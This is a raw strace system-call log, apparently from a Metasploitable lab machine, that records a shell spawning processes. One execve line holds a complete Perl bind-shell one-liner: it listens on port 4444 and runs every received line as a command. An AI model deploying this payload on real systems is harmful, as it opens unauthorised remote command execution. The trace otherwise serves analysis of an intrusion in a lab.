12597 07:43:12.966719 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

12597 07:43:12.966744 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e23000

12597 07:43:12.966784 mmap2(0xb7e37000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7e37000

12597 07:43:12.966814 mmap2(0xb7e39000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e39000

12597 07:43:12.966847 close(1)          = 0

12597 07:43:12.966890 munmap(0xb7fc9000, 29913) = 0

12597 07:43:12.966907 open("/etc/ld.so.cache", O_RDONLY) = 1

12597 07:43:12.966920 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12597 07:43:12.966936 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fc9000

12597 07:43:12.966946 close(1)          = 0

12597 07:43:12.966956 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12597 07:43:12.966971 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

12597 07:43:12.966985 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12597 07:43:12.967075 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

12597 07:43:12.967092 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e19000

12597 07:43:12.967104 mmap2(0xb7e21000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7e21000

12597 07:43:12.967119 close(1)          = 0

12597 07:43:12.967131 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12597 07:43:12.967145 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

12597 07:43:12.967162 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12597 07:43:12.967260 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

12597 07:43:12.967278 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e0e000

12597 07:43:12.967290 mmap2(0xb7e17000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7e17000

12597 07:43:12.967306 close(1)          = 0

12597 07:43:12.967327 munmap(0xb7fc9000, 29913) = 0

12597 07:43:12.967343 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

12597 07:43:12.967357 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

12597 07:43:12.967369 _llseek(1, 0, [0], SEEK_CUR) = 0

12597 07:43:12.967381 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

12597 07:43:12.967397 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7fd0000

12597 07:43:12.967408 _llseek(1, 1624, [1624], SEEK_SET) = 0

12597 07:43:12.967423 munmap(0xb7fd0000, 1624) = 0

12597 07:43:12.967433 close(1)          = 0

12597 07:43:12.967461 getpgrp()         = 3831

12597 07:43:12.967472 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

12597 07:43:12.967487 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

12597 07:43:12.967504 brk(0x8101000)    = 0x8101000

12597 07:43:12.967535 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12597 07:43:12.967550 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12597 07:43:12.967564 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12597 07:43:12.967602 brk(0x8102000)    = 0x8102000

12597 07:43:12.967628 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12597 07:43:12.967647 stat64("/sbin/AB", 0xbff84dd8) = -1 ENOENT (No such file or directory)

12597 07:43:12.967659 stat64("/bin/AB", 0xbff84dd8) = -1 ENOENT (No such file or directory)

12597 07:43:12.967670 stat64("/usr/sbin/AB", 0xbff84dd8) = -1 ENOENT (No such file or directory)

12597 07:43:12.967682 stat64("/usr/bin/AB", 0xbff84dd8) = -1 ENOENT (No such file or directory)

12597 07:43:12.967696 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12597 07:43:12.967710 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e446f8) = 12598

12598 07:43:12.967764 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12598 07:43:12.967780 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12598 07:43:12.967793 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12598 07:43:12.967805 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12598 07:43:12.967820 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12598 07:43:12.967837 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12598 07:43:12.967849 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12598 07:43:12.967904 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

12598 07:43:12.967918 --- SIGPIPE (Broken pipe) @ 0 (0) ---

12598 07:43:12.967984 exit_group(127)   = ?

12597 07:43:13.003649 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>

4519  07:43:13.003685 waitpid(12597,  <unfinished ...>

12597 07:43:13.003712 <... rt_sigprocmask resumed> NULL, 8) = 0

12597 07:43:13.012575 --- SIGCHLD (Child exited) @ 0 (0) ---

12597 07:43:13.012575 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 12598

12597 07:43:13.012575 waitpid(-1, 0xbff84a58, WNOHANG) = -1 ECHILD (No child processes)

12597 07:43:13.012575 sigreturn()       = ? (mask now [])

12597 07:43:13.012576 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12597 07:43:13.012576 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12597 07:43:13.012576 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12597 07:43:13.012576 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

12597 07:43:13.012576 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12597 07:43:13.012577 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

12597 07:43:13.012616 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12597 07:43:13.012637 stat64("/sbin/perl", 0xbff84e08) = -1 ENOENT (No such file or directory)

12597 07:43:13.012650 stat64("/bin/perl", 0xbff84e08) = -1 ENOENT (No such file or directory)

12597 07:43:13.012661 stat64("/usr/sbin/perl", 0xbff84e08) = -1 ENOENT (No such file or directory)

12597 07:43:13.012673 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12597 07:43:13.012692 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12597 07:43:13.012717 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12597 07:43:13.012732 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e446f8) = 12599

12599 07:43:13.012787 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12599 07:43:13.012804 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12599 07:43:13.012817 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12599 07:43:13.012870 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12599 07:43:13.012887 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12599 07:43:13.012902 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12599 07:43:13.012916 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12599 07:43:13.012951 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

12599 07:43:13.013039 brk(0)            = 0x8153000

12599 07:43:13.013059 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12599 07:43:13.013076 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f2a000

12599 07:43:13.013092 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12599 07:43:13.013109 open("/etc/ld.so.cache", O_RDONLY) = 1

12599 07:43:13.013122 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12599 07:43:13.013139 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f22000

12599 07:43:13.013149 close(1)          = 0

12599 07:43:13.013161 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12599 07:43:13.013178 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12599 07:43:13.013207 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12599 07:43:13.013327 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12599 07:43:13.013346 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f1e000

12599 07:43:13.013358 mmap2(0xb7f20000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f20000

12599 07:43:13.013375 close(1)          = 0

12599 07:43:13.013387 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12599 07:43:13.013401 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

12599 07:43:13.013415 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

12599 07:43:13.013504 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

12599 07:43:13.013521 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ef9000

12599 07:43:13.013533 mmap2(0xb7f1c000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f1c000

12599 07:43:13.013549 close(1)          = 0

12599 07:43:13.013561 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12599 07:43:13.013574 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

12599 07:43:13.013589 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

12599 07:43:13.013675 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

12599 07:43:13.013692 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef8000

12599 07:43:13.013705 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ee0000

12599 07:43:13.013716 mmap2(0xb7ef4000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7ef4000

12599 07:43:13.013730 mmap2(0xb7ef6000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ef6000

12599 07:43:13.013747 close(1)          = 0

12599 07:43:13.013759 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12599 07:43:13.013773 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12599 07:43:13.013787 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12599 07:43:13.013988 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12599 07:43:13.014006 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d91000

12599 07:43:13.014018 mmap2(0xb7eda000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7eda000

12599 07:43:13.014032 mmap2(0xb7edd000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7edd000

12599 07:43:13.014046 close(1)          = 0

12599 07:43:13.014059 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12599 07:43:13.014072 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

12599 07:43:13.014086 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

12599 07:43:13.014176 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

12599 07:43:13.014193 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d5f000

12599 07:43:13.014204 mmap2(0xb7d68000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d68000

12599 07:43:13.014218 mmap2(0xb7d6a000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d6a000

12599 07:43:13.014232 close(1)          = 0

12599 07:43:13.014256 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d5e000

12599 07:43:13.014269 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d5e8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12599 07:43:13.014332 mprotect(0xb7eda000, 4096, PROT_READ) = 0

12599 07:43:13.014359 munmap(0xb7f22000, 29913) = 0

12599 07:43:13.014372 set_tid_address(0xb7d5e908) = 12599

12599 07:43:13.014382 set_robust_list(0xb7d5e910, 0xc) = 0

12599 07:43:13.014391 futex(0xbfff2490, 0x81 /* FUTEX_??? */, 1) = 0

12599 07:43:13.014414 rt_sigaction(SIGRTMIN, {0xb7ee42c0, [], SA_SIGINFO}, NULL, 8) = 0

12599 07:43:13.014469 rt_sigaction(SIGRT_1, {0xb7ee4340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

12599 07:43:13.014482 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

12599 07:43:13.014496 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

12599 07:43:13.014515 uname({sys="Linux", node="metasploitable", ...}) = 0

12599 07:43:13.014562 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

12599 07:43:13.014608 brk(0)            = 0x8153000

12599 07:43:13.014617 brk(0x8174000)    = 0x8174000

